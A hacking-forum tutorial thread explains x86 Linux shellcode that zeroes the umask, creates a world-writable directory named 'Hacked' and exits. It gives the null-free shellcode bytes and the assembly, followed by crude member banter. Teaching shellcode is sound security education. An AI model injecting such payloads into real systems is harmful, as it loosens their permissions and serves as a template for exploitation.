EvilZone
Hacking and Security => Tutorials => : parad0x November 10, 2015, 10:22:32 PM
-
Here's the part 2 of my previous tut HERE (https://evilzone.org/high-quality-tutorials/a-brief-look-into-shellcoding/)
I would recommend reading my previous tut before starting this one ;)
Moving on to mkdir shellcode, this shellcode creates a directory with permissions 777 means read, write and execute for all. :)
Algorithm
Make umask 0, then create a directory with permission 777 (in octal) and simply exit.
Now the question arises why did we make umask 0?
The answer lies in the functioning of mkdir, if you pass mkdir some permissions for creating a directory, it assigns the permission of the newly created directory to ~umask & (permission) so by making umask 0, ~umask = 11111111 (NOTE ; here every 1 corresponds to a bit), which means whichever permission you give for the directory, they'll be applied as it is. Got it? Cool.. let's move your ass further. :D
I've removed all the nulls from the shellcode, made it PIC and here is the shellcode \x31\xdb\xf7\xe3\xb0\x3c\xcd\x80\x31\xc9\x5b\xb0\x27\x66\xb9\xff\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x48\x61\x63\x6b\x65\x64
In assembly, it is .text
.globl _start
shellcode:
xorl %ebx, %ebx
mull %ebx
movb $60, %al
int $0x80 # umask syscall on x86 system
xorl %ecx, %ecx
popl %ebx
movb $39, %al
movw $0777, %cx
int $0x80 # mkdir syscall
movb $1, %al
int $0x80 # Exit syscall
_start:
call shellcode
.asciz "Hacked" # Name of the directory to be created
If you know assembly, the code is fairly self explanatory, if you're having problems understanding what the fuck I've given, go learn assembly 8)
(http://s8.postimg.org/k43en6ffp/Screenshot_from_2015_11_11_02_21_14.png)
After putting the shellcode in a C program, we verify it :D
(http://s7.postimg.org/b33nyqkm3/Screenshot_from_2015_11_11_02_26_38.png)
Now you've create a directory with permission 777, go play with it ;)
-
You're missing the "d" in coding in your title.
-
I don't know assembly so it's till quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
-
Sorry folks, it was like 3 in the morning and I was feeling sleepy. :P
-
I don't know assembly so it's till quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
He opted out because he's a vag.
-
I don't know assembly so it's till quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
I said I'll ask and then post those spicy backgrounds, re-read the logs. Btw Decepticon's logo is cool, don't you think so, it seems a bit misaligned but is quite perfectly aligned on the login screen.